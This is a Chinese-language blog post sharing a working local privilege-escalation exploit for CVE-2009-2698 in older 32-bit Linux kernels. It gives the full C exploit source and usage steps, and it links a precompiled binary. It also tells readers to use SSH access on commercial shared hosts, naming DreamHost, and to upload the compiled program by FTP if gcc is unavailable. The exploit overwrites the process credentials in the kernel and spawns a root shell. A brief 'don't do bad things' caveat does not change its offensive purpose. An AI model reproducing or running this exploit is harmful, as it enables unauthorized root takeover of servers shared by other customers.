也谈谈近期暴的linux漏洞 提升权限

Share

    前段时间,爆出一个linux用户提升普通用户权限到root权限的漏洞,很多小白开始试了,进ssh,然后./a,咋什么都没有呢?殊不知,哪有这么简单,还是需要代码的。。本文的末尾提供了代码(代码版权归原作者所有:p0c73n1(at)gmail(dot)com),也提供了编译后的执行程序。gcc版本是gcc (GCC) 4.1.1 20070105。还要注意,此漏洞需要在Linux kernel 2.6 < 2.6.19 (32bit)下才能测试通过,目前还没有好的补救办法。
    国内极少数有主机商提供ssh登入权限,所以,机会不多,但是国外有很多都提供,例如DreamHost等等。。如果空间没有使用gcc的权限,可以找对应版本的gcc编译之后,ftp上去亦可。。编译命令是: gcc -o t t.c,然后执行/path/to/t 即可。。如:

[leekooqi@icnote ~]$ gcc -o t t.c
[leekooqi@icnote ~]$ ./t
sh-3.1# id
uid=0(root) gid=0(root) groups=512(leekooqi)
sh-3.1#

你会发现,你已经拥有root权限了,可以为所欲为了。。但是,记住,不要干坏事!!
原文件如下:

    **
	** 0x82-CVE-2009-2698
	** Linux kernel 2.6 &lt; 2.6.19 (32bit) ip_append_data() local ring0 root exploit
	**
	** Tested White Box 4(2.6.9-5.ELsmp),
	** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
	** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
	** Fedora Core 6(2.6.18-1.2798.fc6).
	**
	** --
	** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
	** Thankful to them.
	**
	** --
	** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c &amp;&amp; ./0x82-CVE-2009-2698
	** sh-3.1# id
	** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
	** sh-3.1#
	** --
	** exploit by <p0c73n1(at)gmail(dot)com>.
	**
	*/
	
	#include <stdio.h>
	#include <unistd.h>
	#include <string.h>
	#include <sys socket.h="">
	#include <sys mman.h="">
	#include <fcntl.h>
	#include <sys personality.h="">
	
	unsigned int uid, gid;
	void get_root_uid(unsigned *task)
	{
	  unsigned *addr=task;
	  while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
	    addr++;
	  }
	  addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
	  addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
	  return;
	}
	void exploit();
	void kernel_code()
	{
	  asm(&quot;exploit:\n&quot;
	    &quot;push %eax\n&quot;
	    &quot;movl $0xfffff000,%eax\n&quot;
	    &quot;andl %esp,%eax\n&quot;
	    &quot;pushl (%eax)\n&quot;
	    &quot;call get_root_uid\n&quot;
	    &quot;addl $4,%esp\n&quot;
	    &quot;popl %eax\n&quot;);
	  return;
	}
	void *kernel=kernel_code;
	
	int main(int argc, char **argv)
	{
	  int fd=0;
	  char buf[1024];
	  struct sockaddr x0x;
	  void *zero_page;
	
	  uid=getuid();
	  gid=getgid();
	  if(uid==0){
	    fprintf(stderr,&quot;[-] check ur uid\n&quot;);
	    return -1;
	  }
	  if(personality(0xffffffff)==PER_SVR4){
	    if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
	      perror(&quot;[-] mprotect()&quot;);
	      return -1;
	    }
	  }
	  else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
	      perror(&quot;[-] mmap()&quot;);
	      return -1;
	  }
	  *(unsigned long *)0x0=0x90909090;
	  *(char *)0x00000004=0x90; /* +1 */
	  *(char *)0x00000005=0xff;
	  *(char *)0x00000006=0x25;
	  *(unsigned long *)0x00000007=(unsigned long)&amp;kernel;
	  *(char *)0x0000000b=0xc3;
	
	  if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
	    perror(&quot;[-] socket()&quot;);
	    return -1;
	  }
	  x0x.sa_family=AF_UNSPEC;
	  memset(x0x.sa_data,0x82,14);
	  memset((char *)buf,0,sizeof(buf));
	  sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&amp;x0x,sizeof(x0x));
	  sendto(fd,buf,1024,0,&amp;x0x,sizeof(x0x));
	  if(getuid()==uid){
	    printf(&quot;[-] exploit failed, try again\n&quot;);
	    return -1;
	  }
	  close(fd);
	  execl(&quot;/bin/sh&quot;,&quot;sh&quot;,&quot;-i&quot;,NULL);
	  return 0;
	}
	
	

编译后的文件:

t.rar